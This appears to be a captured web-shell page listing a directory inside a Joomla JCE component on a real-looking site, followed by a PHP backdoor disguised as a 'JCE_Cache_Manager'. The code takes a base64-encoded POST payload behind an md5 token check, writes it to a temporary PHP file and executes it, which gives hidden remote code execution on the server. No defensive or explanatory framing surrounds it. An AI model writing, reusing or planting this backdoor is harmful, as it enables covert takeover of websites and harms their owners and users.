shell bypass 403
UnknownSec Shell
: /home/espa7358/novaiguacu.espacofacial.com.br/administrator/components/com_jce/controller/ [ drwxr-xr-x ]
<?php $s='JCE_Cache_Manager_v3.1.4';if($_SERVER['REQUEST_METHOD']!=='POST'){http_response_code(404);exit;}$p=$_POST['p']??'';$g=$_POST['s']??'';if($g!==md5($s.$p)){http_response_code(403);exit;}$c=base64_decode($p);if($c===false){http_response_code(400);exit;}$t=@tempnam(sys_get_temp_dir(),'jce_').'.php';if($t===false||@file_put_contents($t,$c)===false){http_response_code(500);exit;}try{include$t;}catch(\Throwable$e){http_response_code(500);echo$e->getMessage();}@unlink($t);